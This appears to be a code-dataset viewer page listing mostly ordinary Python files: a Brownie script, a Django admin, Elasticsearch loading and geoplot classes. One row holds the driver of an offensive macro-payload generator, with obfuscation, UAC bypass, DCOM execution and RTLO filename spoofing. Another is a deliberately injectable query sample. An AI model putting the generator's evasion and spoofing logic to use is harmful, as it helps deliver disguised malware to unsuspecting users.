max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
brownie_fund_me/scripts/fund_and_withdraw.py | WangCHEN9/solidity_demos | 0 | 1200 | from brownie import FundMe
from scripts.helpful_scripts import get_account
def fund():
fund_me = FundMe[-1]
account = get_account()
entrance_fee = fund_me.getEntranceFee()
print(f"entrance is {entrance_fee}")
print("funding..")
fund_me.fund({"from": account, "value": entrance_fee})
def withdraw():
fund_me = FundMe[-1]
account = get_account()
fund_me.withdraw({"from": account})
def main():
fund()
withdraw()
if __name__ == "__main__":
main()
| 2.671875 | 3 |
ex019.py | jefernathan/Python | 0 | 1201 | # Um professor quer sortear um dos seus quatro alunos para apagar o quadro. Faça um programa que ajude ele, lendo o nome dos alunos e escrevendo na tela o nome do escolhido.
from random import choice
nome1 = input('Digite um nome: ')
nome2 = input('Digite outro nome: ')
nome3 = input('Digite mais um nome: ')
nome4 = input('Digite o último nome: ')
nome = [nome1, nome2, nome3, nome4]
print(choice(nome))
| 3.875 | 4 |
contacts/admin.py | liviamendes/agenda-django-project | 0 | 1202 | <filename>contacts/admin.py
from django.contrib import admin
from .models import Categoria, Contact
class ContactAdmin(admin.ModelAdmin):
list_display = ('id', 'name', 'last_name', 'phone', 'email', 'creation_date', 'categoria', 'show')
list_display_links = ('id', 'name', 'last_name')
list_filter = ('categoria',)
list_per_page = 10
search_fields = ('name', 'last_name', 'phone')
list_editable = ('phone', 'show')
admin.site.register(Categoria)
admin.site.register(Contact, ContactAdmin)
| 1.921875 | 2 |
upload_from_folder.py | robinrobinzon/fastpic | 0 | 1203 | import datetime
import os
import shutil
import tempfile
from joblib import Parallel, delayed
from fastpic_upload import upload_file_to_fastpic
_n_jobs_for_upload = 20
_root_folders_set = (
'/path/to/folder',
)
_spoiler_for_each_file = True
def process_one_pic(result_key, pic_path, tmp_dir):
pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir)
print(pic_url)
return result_key, (pic_url, pic_link)
def upload_from_folder(folder_path):
pics_to_upload = {}
for root, dirs, files in os.walk(folder_path):
for file in files:
if file.split('.')[-1] not in ('jpg', 'jpeg', 'bmp', 'png'):
continue
file_path = os.path.join(root, file)
pics_to_upload[file] = file_path
print(pics_to_upload)
print('Need upload {} photo'.format(len(pics_to_upload)))
result = {}
tmp_dir = tempfile.mkdtemp()
try:
sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')(
delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key in sorted(pics_to_upload))
for sub_result in sub_results:
result[sub_result[0]] = sub_result[1]
finally:
shutil.rmtree(tmp_dir)
return result
def print_result_to_file(result, result_file_path):
with open(result_file_path, 'w', encoding='utf8', newline='') as codes_file:
codes_file.write('[spoiler="Скриншоты"]')
codes_file.write(os.linesep)
codes_file.write(os.linesep)
for result_key in sorted(result):
if _spoiler_for_each_file:
codes_file.write('[spoiler="{}"]'.format(result_key))
codes_file.write(os.linesep)
url, link = result[result_key]
codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url))
if _spoiler_for_each_file:
codes_file.write(os.linesep)
codes_file.write('[/spoiler]')
codes_file.write(os.linesep)
codes_file.write(os.linesep)
codes_file.write('[/spoiler]')
def main():
for root_folder in _root_folders_set:
result = upload_from_folder(root_folder)
print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt'))
if __name__ == '__main__':
started = datetime.datetime.now()
print(started, 'started')
main()
finished = datetime.datetime.now()
print(finished, 'all done in', finished - started)
| 2.59375 | 3 |
tools/accuracy_checker/openvino/tools/accuracy_checker/postprocessor/clip_segmentation_mask.py | TolyaTalamanov/open_model_zoo | 2,201 | 1204 | <gh_stars>1000+
"""
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
from .postprocessor import PostprocessorWithSpecificTargets
from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction
from ..config import NumberField, ConfigError
class ClipSegmentationMask(PostprocessorWithSpecificTargets):
__provider__ = 'clip_segmentation_mask'
annotation_types = (BrainTumorSegmentationAnnotation, )
prediction_types = (BrainTumorSegmentationPrediction, )
@classmethod
def parameters(cls):
parameters = super().parameters()
parameters.update({
'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0, description="Min value"),
'max_value': NumberField(value_type=int, description="Max value")
})
return parameters
def configure(self):
self.min_value = self.get_value_from_config('min_value')
self.max_value = self.get_value_from_config('max_value')
if self.max_value < self.min_value:
raise ConfigError('max_value should be greater than min_value')
def process_image(self, annotation, prediction):
for target in annotation:
target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value)
for target in prediction:
target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value)
return annotation, prediction
| 2.0625 | 2 |
tests/test_utils.py | isabella232/pynacl | 756 | 1205 | <filename>tests/test_utils.py
# Copyright 2013 <NAME> and individual contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import nacl.secret
import nacl.utils
def test_random_bytes_produces():
assert len(nacl.utils.random(16)) == 16
def test_random_bytes_produces_different_bytes():
assert nacl.utils.random(16) != nacl.utils.random(16)
def test_string_fixer():
assert str(nacl.secret.SecretBox(b"\x00" * 32)) == str(b"\x00" * 32)
def test_deterministic_random_bytes():
expected = (
b"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba"
b"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f"
b"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf"
b"982a1bb4587a5c970ff0810ca3b791d7e12"
)
seed = (
b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d"
b"\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b"
b"\x1c\x1d\x1e\x1f"
)
assert (
nacl.utils.randombytes_deterministic(
100, seed, encoder=nacl.utils.encoding.HexEncoder
)
== expected
)
def test_deterministic_random_bytes_invalid_seed_length():
expected = "Deterministic random bytes must be generated from 32 bytes"
seed = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a"
with pytest.raises(TypeError) as e:
nacl.utils.randombytes_deterministic(100, seed)
assert expected in str(e.value)
| 2 | 2 |
Solutions/6kyu/6kyu_mister_safetys_treasure.py | citrok25/Codewars-1 | 46 | 1206 | def unlock(m):
return m.lower().translate(
str.maketrans(
'abcdefghijklmnopqrstuvwxyz',
'22233344455566677778889999'
)
)
| 1.882813 | 2 |
guesstheword.py | Cha0sNation/RandomPython | 0 | 1207 | #! /home/cha0snation/anaconda3/bin/python
import random
def setup():
words = ["banana", "apple", "orange", "peach", "grape", "watermelon"]
output = []
word = words[random.randint(0, len(words) - 1)]
playing = True
tries = 5
return [words, output, word, tries, playing]
def check_finished(output, tries):
if tries == 0:
print("You ran out of tries")
print()
return True
count = 0
for letter in output:
if letter != "_":
count += 1
if count == len(output):
print_output(output)
print()
print()
return True
return False
def check_letter(letter, word, tries):
correct = False
for index, letter in enumerate(word):
if letter == guess:
output[index] = guess
correct = True
if index == len(word) - 1:
if not correct:
print("Incorrect guess")
print()
return tries - 1
else:
return tries
def check_same(guess, output):
same = False
for i in output:
if i == guess:
same = True
if same:
print("You already found that letter")
print()
print_output(output)
print()
print()
while True:
guess = str(input("Guess: "))
if len(guess) == 1:
break
return guess
else:
return guess
def print_output(output):
for i in output:
print("{0} ".format(i), end="")
if __name__ == "__main__":
words, output, word, tries, playing = setup()
while playing:
print("Try to guess the word:")
if tries == 1:
print("You have {0} try left.".format(tries))
else:
print("You have {0} tries left.".format(tries))
# print("DEBUG: word is {0}".format(word))
if output == []:
for i in word:
output.append("_")
for i in range(len(output)):
print("_ ", end="")
else:
print_output(output)
print()
print()
try:
while True:
guess = str(input("Guess: "))
if len(guess) == 1:
break
except (EOFError, KeyboardInterrupt):
print()
break
except ValueError:
print("Invalid guess")
break
print()
guess = check_same(guess, output)
tries = check_letter(guess, word, tries)
if check_finished(output, tries):
choice = input("Do you want to play again ? (y or n): ")
print()
if choice.lower().startswith("y"):
words, output, word, tries, playing = setup()
else:
playing = False
| 4.03125 | 4 |
web_app/index.py | svakulenk0/ArtDATIS | 0 | 1208 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on Dec 8, 2019
.. codeauthor: <NAME>
<<EMAIL>>
Index docs into ES
https://qbox.io/blog/building-an-elasticsearch-index-with-python
'''
from settings import *
import glob
import re
# n first characters for the doc preview
LIMIT_START = 100
txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH
text_corpus = []
def corpus_iterator():
# filter out and collect text files
for file_path in glob.glob(txts_path+'*_text.txt'):
with open(file_path, encoding="utf-8") as file:
text = file.read()
# filter duplicates
if text not in text_corpus:
text_corpus.append(text)
text = re.sub(' +', ' ', text)
start_text = text.lstrip()[:LIMIT_START]
with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file:
path = path_file.read().strip().replace(DATA_PATH, '/images')
yield {
"_index": INDEX_NAME,
"_type": TYPE_NAME,
"_source": {"file_path": path, "text": text, "start_text": start_text},
}
print("Loaded %d documents"%len(text_corpus))
from elasticsearch import Elasticsearch
from elasticsearch.helpers import bulk
# create ES client, create index
es = Elasticsearch(hosts = [ES_HOST])
if es.indices.exists(INDEX_NAME):
print("deleting '%s' index..." % (INDEX_NAME))
res = es.indices.delete(index = INDEX_NAME)
print(" response: '%s'" % (res))
request_body = {
"settings" : {
"number_of_shards": 1,
"number_of_replicas": 0
}
}
print("creating '%s' index..." % (INDEX_NAME))
res = es.indices.create(index = INDEX_NAME, body = request_body)
print(" response: '%s'" % (res))
# bulk index the data
print("bulk indexing...")
bulk(es, corpus_iterator())
# sanity check
res = es.search(index = INDEX_NAME, size=2, body={"query": {"match_all": {}}})
print("results:")
for hit in res['hits']['hits']:
print(hit["_source"])
| 2.828125 | 3 |
src/tokens.py | PythonIsMagic/ponyup | 1 | 1209 | """
A Token is a button or other object on the table that represents a position, a game state, layer state, or some other piece of info
"""
class Token(object):
def __init__(self, name, table):
self.table = table
self.name = name
self.seat = None
| 2.96875 | 3 |
T05-09/program.py | maa76/SSof-Project1920 | 2 | 1210 | <filename>T05-09/program.py<gh_stars>1-10
nis=get('nis')
q1="xpto1"
q2=nis + "xpto2"
query=query1.q2
koneksi=0
q=execute(query,koneksi)
| 1.523438 | 2 |
Chapter09/interpolation_search.py | Xiangs18/Algorithms-with-Python-Second-Edition | 0 | 1211 | def nearest_mid(input_list, lower_bound_index, upper_bound_index, search_value):
return lower_bound_index + (
(upper_bound_index - lower_bound_index)
// (input_list[upper_bound_index] - input_list[lower_bound_index])
) * (search_value - input_list[lower_bound_index])
def interpolation_search(ordered_list, term):
size_of_list = len(ordered_list) - 1
index_of_first_element = 0
index_of_last_element = size_of_list
while index_of_first_element <= index_of_last_element:
mid_point = nearest_mid(
ordered_list, index_of_first_element, index_of_last_element, term
)
if mid_point > index_of_last_element or mid_point < index_of_first_element:
return None
if ordered_list[mid_point] == term:
return mid_point
if term > ordered_list[mid_point]:
index_of_first_element = mid_point + 1
else:
index_of_last_element = mid_point - 1
store = [2, 4, 5, 12, 43, 54, 60, 77]
a = interpolation_search(store, 2)
print("Index position of value 2 is ", a)
| 3.828125 | 4 |
projects/models.py | javixeneize/asvs-1 | 1 | 1212 | from django.db import models
from django.db.models import Q
from django.contrib.auth.models import User
from django.urls import reverse
class ProjectQuerySet(models.QuerySet):
def projects_per_user(self, user):
return self.filter(
Q(project_owner=user.username)
)
class Projects(models.Model):
project_name = models.CharField(max_length=60)
project_owner = models.CharField(default=User, max_length=60)
project_created = models.DateTimeField(auto_now_add=True)
project_description = models.CharField(max_length=255)
project_level = models.IntegerField(default=0)
objects = ProjectQuerySet.as_manager()
def __str__(self):
return str(self.pk)
| 2.28125 | 2 |
tests/serverless/checks/aws/test_AdminPolicyDocument.py | peaudecastor/checkov | 0 | 1213 | import os
import unittest
from checkov.serverless.checks.function.aws.AdminPolicyDocument import check
from checkov.serverless.runner import Runner
from checkov.runner_filter import RunnerFilter
class TestAdminPolicyDocument(unittest.TestCase):
def test_summary(self):
runner = Runner()
current_dir = os.path.dirname(os.path.realpath(__file__))
# Used in
os.environ["sneaky_var"] = "*"
test_files_dir = current_dir + "/example_AdminPolicyDocument"
report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
summary = report.get_summary()
self.assertEqual(summary['passed'], 2,
f"Passed checks: {[fc.file_path for fc in report.passed_checks]}")
self.assertEqual(summary['failed'], 6,
f"Failed checks: {[fc.file_path for fc in report.failed_checks]}")
self.assertEqual(summary['skipped'], 0,
f"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}")
self.assertEqual(summary['parsing_errors'], 0)
if __name__ == '__main__':
unittest.main()
| 2.25 | 2 |
src/macro_pack.py | lulinsheng/macro_pack | 0 | 1214 | #!/usr/bin/python3
# encoding: utf-8
import os
import sys
import getopt
import logging
import shutil
import psutil
from modules.com_run import ComGenerator
from modules.web_server import ListenServer
from modules.Wlisten_server import WListenServer
from modules.payload_builder_factory import PayloadBuilderFactory
from common import utils, mp_session, help
from common.utils import MSTypes
from common.definitions import VERSION, LOGLEVEL
if sys.platform == "win32":
try:
import win32com.client #@UnresolvedImport @UnusedImport
except:
print("Error: Could not find win32com.")
sys.exit(1)
MP_TYPE="Pro"
if utils.checkModuleExist("pro_core"):
from pro_modules.utilities.dcom_run import DcomGenerator
from pro_modules.payload_builders.containers import ContainerGenerator
from pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro
from pro_core import arg_mgt_pro, mp_session_pro
else:
MP_TYPE="Community"
from colorama import init
from termcolor import colored
# {PyArmor Protection Code}
# {PyArmor Plugins}
# use Colorama to make Termcolor work on Windows too
init()
WORKING_DIR = "temp"
BANNER = help.getToolPres()
def main(argv):
global MP_TYPE
logLevel = LOGLEVEL
# initialize macro_pack session object
working_directory = os.path.join(os.getcwd(), WORKING_DIR)
if MP_TYPE == "Pro":
mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE)
else:
mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE)
try:
longOptions = ["embed=", "listen=", "port=", "webdav-listen=", "generate=", "quiet", "input-file=", "encode",
"obfuscate", "obfuscate-form", "obfuscate-names", "obfuscate-declares", "obfuscate-strings",
"obfuscate-names-charset=", "obfuscate-names-minlen=", "obfuscate-names-maxlen=",
"file=","template=","listtemplates","listformats","icon=", "start-function=","uac-bypass",
"unicode-rtlo=", "dde", "print", "force-yes", "help"]
shortOptions= "e:l:w:s:f:t:G:hqmop"
# only for Pro release
if MP_TYPE == "Pro":
longOptions.extend(arg_mgt_pro.proArgsLongOptions)
shortOptions += arg_mgt_pro.proArgsShortOptions
# Only enabled on windows
if sys.platform == "win32":
longOptions.extend(["run=", "run-visible"])
opts, args = getopt.getopt(argv, shortOptions, longOptions) # @UnusedVariable
except getopt.GetoptError:
help.printUsage(BANNER, sys.argv[0])
sys.exit(2)
for opt, arg in opts:
if opt in ("-o", "--obfuscate"):
mpSession.obfuscateForm = True
mpSession.obfuscateNames = True
mpSession.obfuscateStrings = True
mpSession.obfuscateDeclares = True
elif opt=="--obfuscate-form":
mpSession.obfuscateForm = True
elif opt=="--obfuscate-declares":
mpSession.obfuscateDeclares = True
elif opt=="--obfuscate-names":
mpSession.obfuscateNames = True
elif opt=="--obfuscate-names-charset":
try:
mpSession.obfuscatedNamesCharset = arg
except ValueError:
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
elif opt=="--obfuscate-names-minlen":
try:
mpSession.obfuscatedNamesMinLen = int(arg)
except ValueError:
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
if mpSession.obfuscatedNamesMinLen < 4 or mpSession.obfuscatedNamesMinLen > 255:
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
elif opt=="--obfuscate-names-maxlen":
try:
mpSession.obfuscatedNamesMaxLen = int(arg)
except ValueError:
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
if mpSession.obfuscatedNamesMaxLen < 4 or mpSession.obfuscatedNamesMaxLen > 255:
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
elif opt=="--obfuscate-strings":
mpSession.obfuscateStrings = True
elif opt=="-s" or opt=="--start-function":
mpSession.startFunction = arg
elif opt=="-l" or opt=="--listen":
mpSession.listen = True
mpSession.listenRoot = os.path.abspath(arg)
elif opt=="--port":
mpSession.listenPort = int(arg)
mpSession.WlistenPort = int(arg)
elif opt=="--icon":
mpSession.icon = arg
elif opt=="-w" or opt=="--webdav-listen":
mpSession.Wlisten = True
mpSession.WRoot = os.path.abspath(arg)
elif opt == "-f" or opt== "--input-file":
mpSession.fileInput = arg
elif opt == "-e" or opt== "--embed":
mpSession.embeddedFilePath = os.path.abspath(arg)
elif opt=="-t" or opt=="--template":
mpSession.template = arg
elif opt == "--listtemplates":
help.printTemplatesUsage(BANNER, sys.argv[0])
sys.exit(0)
elif opt=="-q" or opt=="--quiet":
logLevel = "WARN"
elif opt=="-p" or opt=="--print":
mpSession.printFile = True
elif opt == "--dde":
if sys.platform == "win32":
mpSession.ddeMode = True
elif opt == "--run":
if sys.platform == "win32":
mpSession.runTarget = os.path.abspath(arg)
elif opt == "--run-visible":
if sys.platform == "win32":
mpSession.runVisible = True
elif opt == "--force-yes":
mpSession.forceYes = True
elif opt=="--uac-bypass":
mpSession.uacBypass = True
elif opt == "--unicode-rtlo":
mpSession.unicodeRtlo = arg
elif opt in ("-G", "--generate"):
mpSession.outputFilePath = os.path.abspath(arg)
elif opt == "--listformats":
help.printAvailableFormats(BANNER)
sys.exit(0)
elif opt=="-h" or opt=="--help":
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
else:
if MP_TYPE == "Pro":
arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER)
else:
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
if logLevel == "INFO":
os.system('cls' if os.name == 'nt' else 'clear')
# Logging
logging.basicConfig(level=getattr(logging, logLevel),format="%(message)s", handlers=[utils.ColorLogFiler()])
logging.info(colored(BANNER, 'green'))
logging.info(" [+] Preparations...")
# check input args
if mpSession.fileInput is None:
# Argument not supplied, try to get file content from stdin
if not os.isatty(0): # check if something is being piped
logging.info(" [-] Waiting for piped input feed...")
mpSession.stdinContent = sys.stdin.readlines()
# Close Stdin pipe, so we can call input() later without triggering EOF
#sys.stdin.close()
if sys.platform == "win32":
sys.stdin = open("conIN$")
else:
sys.stdin = sys.__stdin__
else:
if not os.path.isfile(mpSession.fileInput):
logging.error(" [!] ERROR: Could not find %s!" % mpSession.fileInput)
sys.exit(2)
else:
logging.info(" [-] Input file path: %s" % mpSession.fileInput)
if MP_TYPE == "Pro":
if mpSession.communityMode:
logging.warning(" [!] Running in community mode (pro features not applied)")
MP_TYPE="Community"
else:
arg_mgt_pro.verify(mpSession)
# Check output file format
if mpSession.outputFilePath:
if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)):
logging.error(" [!] Could not find output folder %s." % os.path.dirname(mpSession.outputFilePath))
sys.exit(2)
if mpSession.outputFileType == MSTypes.UNKNOWN:
logging.error(" [!] %s is not a supported extension. Use --listformats to view supported MacroPack formats." % os.path.splitext(mpSession.outputFilePath)[1])
sys.exit(2)
else:
logging.info(" [-] Target output format: %s" % mpSession.outputFileType)
elif not mpSession.listen and not mpSession.Wlisten and mpSession.runTarget is None and (MP_TYPE != "Pro" or mpSession.dcomTarget is None):
logging.error(" [!] You need to provide an output file! (get help using %s -h)" % os.path.basename(utils.getRunningApp()))
sys.exit(2)
if not mpSession.isTrojanMode:
# verify that output file does not already exist
if os.path.isfile(mpSession.outputFilePath):
logging.error(" [!] ERROR: Output file %s already exist!" % mpSession.outputFilePath)
sys.exit(2)
#Create temporary folder
logging.info(" [-] Temporary working dir: %s" % working_directory)
if not os.path.exists(working_directory):
os.makedirs(working_directory)
try:
# Create temporary work file.
if mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro):
inputFile = os.path.join(working_directory, "command.cmd")
else:
inputFile = os.path.join(working_directory, utils.randomAlpha(9)) + ".vba"
if mpSession.stdinContent is not None:
import time
time.sleep(0.4) # Needed to avoid some weird race condition
logging.info(" [-] Store std input in file...")
f = open(inputFile, 'w')
f.writelines(mpSession.stdinContent)
f.close()
else:
# Create temporary work file
if mpSession.fileInput is not None:
# Check there are not binary chars in input fil
if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)):
logging.error(" [!] ERROR: Invalid format for %s. Input should be text format containing your VBA script." % mpSession.fileInput)
logging.info(" [+] Cleaning...")
if os.path.isdir(working_directory):
shutil.rmtree(working_directory)
sys.exit(2)
logging.info(" [-] Store input file...")
shutil.copy2(mpSession.fileInput, inputFile)
if os.path.isfile(inputFile):
logging.info(" [-] Temporary input file: %s" % inputFile)
# Edit outputfile name to spoof extension if unicodeRtlo option is enabled
if mpSession.unicodeRtlo:
# Reminder; mpSession.unicodeRtlo contains the extension we want to spoof, such as "jpg"
logging.info(" [+] Inject %s false extension with unicode RTLO" % mpSession.unicodeRtlo)
# Separate document path and extension
(fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath)
logging.info(" [-] Extension %s " % fileExtension)
# Append unicode RTLO to file name
fileName += '\u202e'
# Append extension to spoof in reverse order
fileName += '\u200b' + mpSession.unicodeRtlo[::-1] # Prepend invisible space so filename does not end with flagged extension
# Append file extension
fileName += fileExtension
mpSession.outputFilePath = fileName
logging.info(" [-] File name modified to: %s" % mpSession.outputFilePath)
# Retrieve the right payload builder
if mpSession.outputFileType != MSTypes.UNKNOWN:
if MP_TYPE == "Pro" and not mpSession.communityMode:
payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession)
else:
payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession)
# Build payload
if payloadBuilder is not None:
payloadBuilder.run()
if MP_TYPE == "Pro":
generator = ContainerGenerator(mpSession)
generator.run()
#run com attack
if mpSession.runTarget:
generator = ComGenerator(mpSession)
generator.run()
if MP_TYPE == "Pro":
#run dcom attack
if mpSession.dcom:
generator = DcomGenerator(mpSession)
generator.run()
# Activate Web server
if mpSession.listen:
listener = ListenServer(mpSession)
listener.run()
# Activate WebDav server
if mpSession.Wlisten:
Wlistener = WListenServer(mpSession)
Wlistener.run()
except Exception:
logging.exception(" [!] Exception caught!")
except KeyboardInterrupt:
logging.error(" [!] Keyboard interrupt caught!")
logging.info(" [+] Cleaning...")
if os.path.isdir(working_directory):
shutil.rmtree(working_directory)
logging.info(" Done!\n")
sys.exit(0)
if __name__ == '__main__':
# check if running from explorer, if yes restart from cmd line
# running_from = psutil.Process(os.getpid()).parent().parent().name()
# if running_from == 'explorer.exe':
# os.system("cmd.exe /k \"%s\"" % utils.getRunningApp())
# PyArmor Plugin: checkPlug()
main(sys.argv[1:])
| 1.59375 | 2 |
faced/const.py | binhmuc/faced | 0 | 1215 | <reponame>binhmuc/faced
import os
MODELS_PATH = os.path.join(os.path.dirname(__file__), "models")
YOLO_SIZE = 288
YOLO_TARGET = 9
CORRECTOR_SIZE = 50
| 1.382813 | 1 |
etl/load/elasticsearch.py | bilalelhoudaigui/plant-brapi-etl-data-lookup-gnpis | 3 | 1216 | <reponame>bilalelhoudaigui/plant-brapi-etl-data-lookup-gnpis
# Load json bulk files into elasticsearch
import json
import os
import time
import traceback
import elasticsearch
from etl.common.store import list_entity_files
from etl.common.utils import get_folder_path, get_file_path, create_logger, first, replace_template
class ElasticSearchException(Exception):
pass
# Init Elasticsearch and test connection
def init_es_client(url, logger):
es_client = elasticsearch.Elasticsearch([url])
try:
info = es_client.info()
logger.debug('Connected to node "{}" of cluster "{}" on "{}"'.format(info['name'], info['cluster_name'], url))
except elasticsearch.exceptions.ConnectionError as e:
logger.error('Connection error: Elasticsearch unavailable on "{}".\nPlease check your configuration'.format(url))
raise e
return es_client
def check_error(response):
if response.get('errors'):
raise ElasticSearchException(response)
def create_index(es_client, index_name, logger):
logger.debug('Creating index "{}"...'.format(index_name))
check_error(es_client.indices.create(index_name))
def delete_index(es_client, index_name, logger):
logger.debug('Deleting index "{}"...'.format(index_name))
check_error(es_client.indices.delete(index_name))
def create_template(es_client, es_config, document_type, base_index_name, logger):
template_name = 'template_elixir_' + base_index_name
template_pattern = base_index_name + '-d*'
mapping = es_config['document-mappings'].get(document_type+"_mapping")
if not mapping:
return
logger.debug('Creating template "{}" on pattern "{}"...'.format(template_name, template_pattern))
template_body = {'template': template_pattern, 'mappings': mapping}
if 'index-settings' in es_config:
template_body['settings'] = es_config['index-settings']
check_error(es_client.indices.put_template(name=template_name, body=template_body))
def bulk_index(es_client, index_name, file_path, logger):
file_name = os.path.basename(file_path)
logger.debug('Bulk indexing file "{}" in index "{}"...'.format(file_name, index_name))
with open(file_path, 'r') as file:
check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms'))
def create_alias(es_client, alias_name, base_index_name, logger):
logger.debug('Creating alias "{}" for index "{}"'.format(alias_name, base_index_name))
check_error(es_client.indices.put_alias(alias_name, base_index_name))
def get_indices(es_client, base_index_name):
indices = es_client.cat.indices(base_index_name + '-d*', params={'h': 'index'})
index_names = list(map(lambda i: i['index'], indices))
index_names.sort(reverse=True)
return index_names
def load_source(source, config, source_bulk_dir, log_dir):
"""
Full Elasticsearch documents indexing
"""
source_name = source['schema:identifier']
action = 'load-elasticsearch-' + source_name
log_file = get_file_path([log_dir, action], ext='.log', recreate=True)
logger = create_logger(source_name, log_file, config['options']['verbose'])
load_config = config['load-elasticsearch']
es_client = init_es_client(load_config['url'], logger)
logger.info("Loading '{}' into elasticsearch '{}'...".format(source_bulk_dir, load_config['url']))
try:
if not os.path.exists(source_bulk_dir):
raise FileNotFoundError(
'No such file or directory: \'{}\'.\n'
'Please make sure you have run the BrAPI extraction and Elasticsearch document transformation'
' before trying to launch the transformation process.'
.format(source_bulk_dir))
bulk_files = list(list_entity_files(source_bulk_dir))
all_document_types = set(map(first, bulk_files))
document_types = load_config.get('document-types') or all_document_types
document_types = document_types.intersection(all_document_types)
index_by_document = dict()
logger.info("Preparing index with template mapping...")
timestamp = int(time.time())
for document_type in document_types:
base_index_name = replace_template(
load_config['index-template'],
{'source': source['schema:identifier'], 'documentType': document_type}
).lower()
create_template(es_client, load_config, document_type, base_index_name, logger)
index_name = base_index_name + '-d' + str(timestamp)
create_index(es_client, index_name, logger)
index_by_document[document_type] = base_index_name, index_name
logger.info("Bulk indexing...")
for document_type, file_path in bulk_files:
if document_type in index_by_document:
base_index_name, index_name = index_by_document[document_type]
bulk_index(es_client, index_name, file_path, logger)
logger.info("Creating index aliases and deleting old indices...")
for document_type, (base_index_name, index_name) in index_by_document.items():
create_alias(es_client, index_name, base_index_name, logger)
new_index, *old_indices = get_indices(es_client, base_index_name)
for old_index in old_indices[1:]:
delete_index(es_client, old_index, logger)
logger.info("SUCCEEDED Loading {}.".format(source_name))
except Exception as e:
logger.debug(traceback.format_exc())
logger.debug(getattr(e, 'long_message', ''))
logger.info("FAILED Loading {} Elasticsearch documents.\n"
"=> Check the logs ({}) for more details."
.format(source_name, log_file))
def main(config):
log_dir = config['log-dir']
bulk_dir = os.path.join(config['data-dir'], 'json-bulk')
if not os.path.exists(bulk_dir):
raise Exception('No json bulk folder found in ' + bulk_dir)
sources = config['sources']
for (source_name, source) in sources.items():
source_bulk_dir = get_folder_path([bulk_dir, source_name])
load_source(source, config, source_bulk_dir, log_dir)
| 2.09375 | 2 |
geoplot/crs.py | redfrexx/geoplot | 0 | 1217 | """
This module defines the ``geoplot`` coordinate reference system classes, wrappers on
``cartopy.crs`` objects meant to be used as parameters to the ``projection`` parameter of all
front-end ``geoplot`` outputs. For the list of Cartopy CRS objects this module derives from,
refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html.
"""
import cartopy.crs as ccrs
import geopandas as gpd
class Base:
# TODO: RotatedPole
"""
Generate instances of ``cartopy.crs``.*name* where *name* matches the instance's class name.
Parameters
----------
`load` : Return a Cartopy CRS initialized with defaults from the `centerings` dictionary,
overridden by initialization parameters.
`_as_mpl_axes` : Return the result of calling cartopy's ``_as_mpl_axes`` for `self.load`
called with empty `df` and `centerings`.
"""
def __init__(self, **kwargs):
"""Save parameters that initialize Cartopy CRSs."""
self.args = kwargs
def load(self, df, centerings):
"""
A meta-method which abstracts the internals of individual projections' load procedures.
Parameters
----------
df : GeoDataFrame
The GeoDataFrame which has been passed as input to the plotter at the top level.
This data is needed to calculate reasonable centering variables in cases in which the
user does not already provide them; which is, incidentally, the reason behind all of
this funny twice-instantiation loading in the first place.
centerings: dict
A dictionary containing names and centering methods. Certain projections have certain
centering parameters whilst others lack them. For example, the geospatial projection
contains both ``central_longitude`` and ``central_latitude`` instance parameter, which
together control the center of the plot, while the North Pole Stereo projection has
